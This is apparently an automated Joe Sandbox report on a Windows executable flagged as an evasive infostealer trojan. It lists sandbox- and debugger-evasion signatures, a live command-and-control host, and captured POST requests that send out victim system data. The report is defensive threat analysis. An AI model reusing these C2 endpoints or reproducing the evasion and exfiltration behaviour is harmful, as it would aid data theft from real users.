Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Yda6AxtlVP.exe

Overview

General Information

Sample name:Yda6AxtlVP.exe
renamed because original name is a hash value
Original sample name:339948cf14bfed6a4e1cd717beeb9fff.exe
Analysis ID:1579641
MD5:339948cf14bfed6a4e1cd717beeb9fff
SHA1:5579437dde79a533dd625fb7fb1ccdb6226e3364
SHA256:6eb9cd9fe518bd6649b3db9de8478d7e8570fa22272b111a76c491749e049994
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Yda6AxtlVP.exe (PID: 7820 cmdline: "C:\Users\user\Desktop\Yda6AxtlVP.exe" MD5: 339948CF14BFED6A4E1CD717BEEB9FFF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Yda6AxtlVP.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: Yda6AxtlVP.exeReversingLabs: Detection: 65%
Source: Yda6AxtlVP.exeVirustotal: Detection: 65%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Yda6AxtlVP.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: -----BEGIN PUBLIC KEY-----0_2_00D7DCF0
Source: Yda6AxtlVP.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_00DBA5B0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00DBB560
Source: Yda6AxtlVP.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D5255D
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00D529FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1Host: home.fivetk5sb.topAccept: */*Content-Type: application/jsonContent-Length: 442597Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 36 37 33 32 33 33 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1Host: home.fivetk5sb.topAccept: */*Content-Type: application/jsonContent-Length: 209Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00E1A8C0 recvfrom,0_2_00E1A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5sb.top
Source: unknownHTTP traffic detected: POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1Host: home.fivetk5sb.topAccept: */*Content-Type: application/jsonContent-Length: 442597Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 36 37 33 32 33 33 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Mon, 23 Dec 2024 05:55:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: Yda6AxtlVP.exe, 00000000.00000003.1420608833.0000000001D55000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1420788724.0000000001D58000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000002.1452479719.0000000001D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5sb.top/niCGM
Source: Yda6AxtlVP.exe, 00000000.00000003.1420608833.0000000001D55000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1420788724.0000000001D58000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000002.1452479719.0000000001D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5sb.top/niCGME_
Source: Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB17
Source: Yda6AxtlVP.exe, 00000000.00000002.1452288617.0000000001CF9000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1421366033.0000000001CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
Source: Yda6AxtlVP.exe, 00000000.00000003.1421366033.0000000001CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB173479675335a1
Source: Yda6AxtlVP.exe, 00000000.00000002.1452288617.0000000001CF9000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1421366033.0000000001CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB17347967534fd4
Source: Yda6AxtlVP.exe, 00000000.00000003.1420608833.0000000001D55000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1420788724.0000000001D58000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000002.1452479719.0000000001D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753?argument=
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhB
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Yda6AxtlVP.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: Yda6AxtlVP.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: Yda6AxtlVP.exe, Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

System Summary

barindex
PE file contains section with special chars
Source: Yda6AxtlVP.exeStatic PE information: section name:
Source: Yda6AxtlVP.exeStatic PE information: section name: .idata
Source: Yda6AxtlVP.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D940110_3_01D94011
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D7F4400_3_01D7F440
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D7F4400_3_01D7F440
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D7F4400_3_01D7F440
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D7F4400_3_01D7F440
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D605B00_2_00D605B0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D66FA00_2_00D66FA0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00E1B1800_2_00E1B180
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D8F1000_2_00D8F100
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00E200E00_2_00E200E0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010DA0000_2_010DA000
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010DE0500_2_010DE050
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00DB62100_2_00DB6210
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00E1C3200_2_00E1C320
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00E204200_2_00E20420
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010A44100_2_010A4410
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010B67300_2_010B6730
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010D47800_2_010D4780
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D5E6200_2_00D5E620
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00DBA7F00_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00E1C7700_2_00E1C770
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D649400_2_00D64940
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D5A9600_2_00D5A960
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00E0C9000_2_00E0C900
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_0100AB2C0_2_0100AB2C
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00F26AC00_2_00F26AC0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010C8BF00_2_010C8BF0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D5CBB00_2_00D5CBB0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00EE4B600_2_00EE4B60
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_0100AAC00_2_0100AAC0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010D4D400_2_010D4D40
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010CCD800_2_010CCD80
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010DCC900_2_010DCC90
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010A2F900_2_010A2F90
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_0106AE300_2_0106AE30
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00E1EF900_2_00E1EF90
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00E18F900_2_00E18F90
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D74F700_2_00D74F70
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D610E60_2_00D610E6
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010C35B00_2_010C35B0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010BD4300_2_010BD430
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010E17A00_2_010E17A0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010A56D00_2_010A56D0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010A99200_2_010A9920
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00E098800_2_00E09880
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010C1BD00_2_010C1BD0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D91BE00_2_00D91BE0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010D3A700_2_010D3A70
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00D573F0 appears 110 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00E344A0 appears 69 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00D95340 appears 43 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00D94F40 appears 307 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00F2CBC0 appears 99 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00D575A0 appears 646 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00D950A0 appears 90 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00D6CD40 appears 78 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00F07220 appears 91 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00D571E0 appears 47 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00D5CAA0 appears 62 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00D6CCD0 appears 55 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00D94FD0 appears 251 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: String function: 00D5C960 appears 32 times
Source: Yda6AxtlVP.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Yda6AxtlVP.exeStatic PE information: Section: agnlrrtx ZLIB complexity 0.9945160602247656
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D5255D
